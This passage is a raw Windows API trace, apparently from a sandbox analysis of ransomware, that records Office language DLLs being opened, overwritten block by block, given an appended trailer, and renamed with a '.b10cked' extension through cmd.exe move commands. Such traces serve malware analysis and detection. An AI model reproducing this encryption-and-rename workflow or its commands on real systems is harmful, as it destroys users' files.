lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xe6c, dwThreadId=0x82c)) returned 1 [0157.490] CloseHandle (hObject=0x1b4) returned 1 [0157.490] CloseHandle (hObject=0x114) returned 1 [0157.490] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0157.490] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0157.490] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0157.490] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.490] ReleaseMutex (hMutex=0xf8) returned 1 [0157.490] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.490] ReleaseMutex (hMutex=0xf8) returned 1 [0157.490] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.490] ReleaseMutex (hMutex=0xf8) returned 1 [0157.490] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.490] ReleaseMutex (hMutex=0xf8) returned 1 [0157.491] CreateFileW (lpFileName="C:\\Users\\All 
Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21428015148) returned 1 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] SetFilePointer 
(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x45a78 [0157.492] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0157.525] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0157.525] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0157.525] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x45f60 [0157.525] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0157.526] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0157.526] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0157.526] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x45f60 [0157.526] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0157.526] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0157.526] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0157.659] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0157.661] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, 
nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0157.662] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0157.662] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0157.663] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0157.663] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0157.663] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x25f60 [0157.663] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0157.679] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0157.721] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0157.738] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, 
lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x25f60 [0157.738] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0157.738] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0157.739] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0157.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0157.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPINTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0157.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x45f60 [0157.744] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0157.744] CloseHandle (hObject=0x114) returned 1 [0157.747] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX") returned 0x3c [0157.748] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0157.748] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x324, dwThreadId=0xf70)) returned 1 [0157.750] CloseHandle (hObject=0x1b4) returned 1 [0157.750] CloseHandle (hObject=0x114) returned 1 [0157.750] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0157.750] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0157.750] CompareStringW (Locale=0x400, dwCmpFlags=0x0, 
lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0157.750] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.751] ReleaseMutex (hMutex=0xf8) returned 1 [0157.751] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.751] ReleaseMutex (hMutex=0xf8) returned 1 [0157.751] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.751] ReleaseMutex (hMutex=0xf8) returned 1 [0157.751] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.751] ReleaseMutex (hMutex=0xf8) returned 1 [0157.751] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0157.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.846] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21463483438) returned 1 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1a360 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x19e78 [0157.847] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0157.849] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0157.849] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0157.849] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1a360 [0157.849] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0157.849] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0157.849] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0157.849] 